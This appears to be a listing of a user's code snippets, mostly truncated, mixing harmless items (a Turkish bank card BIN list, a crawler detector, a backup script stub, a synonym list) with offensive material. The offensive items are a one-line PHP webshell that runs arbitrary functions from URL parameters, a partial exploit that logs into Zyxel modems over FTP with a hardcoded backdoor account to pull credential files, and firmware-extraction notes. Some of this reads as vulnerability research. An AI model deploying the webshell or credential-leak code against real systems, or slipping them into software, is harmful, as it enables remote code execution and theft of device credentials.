numanturle

## Search Block in Transient (30 Sec)
 // Get user IP in WordPress
function get_the_user_ip() {
	if ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) {
	//check ip from share internet
	$ip = $_SERVER['HTTP_CLIENT_IP'];
	}else {
	$ip = $_SERVER['REMOTE_ADDR'];
	}
	return apply_filters( 'wpb_get_ip', $ip );
}

## Kredi Kartı BIN Listesi - CSV
bin,banka_kodu,banka_adi,type,sub_type,virtual,prepaid
413226,10,T.C. ZİRAAT BANKASI A.Ş.,VISA,PLATINUM
444676,10,T.C. ZİRAAT BANKASI A.Ş.,VISA,CLASSIC
444677,10,T.C. ZİRAAT BANKASI A.Ş.,VISA,GOLD
444678,10,T.C. ZİRAAT BANKASI A.Ş.,VISA,PLATINUM
453955,10,T.C. ZİRAAT BANKASI A.Ş.,VISA, CLASSIC
453956,10,T.C. ZİRAAT BANKASI A.Ş.,VISA, GOLD
454671,10,T.C. ZİRAAT BANKASI A.Ş.,VISA, CLASSIC
454672,10,T.C. ZİRAAT BANKASI A.Ş.,VISA, CLASSIC
454673,10,T.C. ZİRAAT BANKASI A.Ş.,VISA, BUSINESS

## crawler_detect.php
<?php

/**
 * Check if the given user agent string is one of a crawler, spider, or bot.
 *
 * @param string $user_agent
 *   A user agent string (e.g. Googlebot/2.1 (+http://www.google.com/bot.html))
 *
 * @return bool
 *   TRUE if the user agent is a bot, FALSE if not.

## dizindeki bozuk türkçe karakterlerini düzeltmek için
aynı dizinde bulunan bozuk türkçe karakterlerini düzeltir.

## yedek.sh
#!/bin/sh
BACKUP=/tmp/backup.$$
NOW=$(date +"%Y-%m-%d")
FTPD="/yedek"
FTPS="SUNUCU"
FTPU="USER"
FTPP="PASS"
FTPPO="PORT"
DBS="dbname dbname2 mysql"
[ ! -d $BACKUP ] && mkdir -p $BACKUP || :

## tr_synonymous.data
herkesin|her insanın
kilo verme|zayıflama
ilahiyat|tanrı bilim
masraftır|harcamadır
sevincinden|luğundan
dediğine|söylediğine
dediğini|söylediğini
başlarda|başlangıçta
rahatsızlık|hastalık
civarlarda|yörelerde

## 22 bayt php webshell
<?=$_GET[z]($_GET[x]);

## Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
# Date: 2018-11-17
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0


@modem_gateway = "192.168.1.1" // default address

## ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor

$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files

if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
	$open = file($local_file);

## Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
131072        0x20000         JFFS2 filesystem, big endian

JFFS2 filesystem extract

total 1492
1049502 drwxr-xr-x 18 root root    4096 Oct 27 23:33 .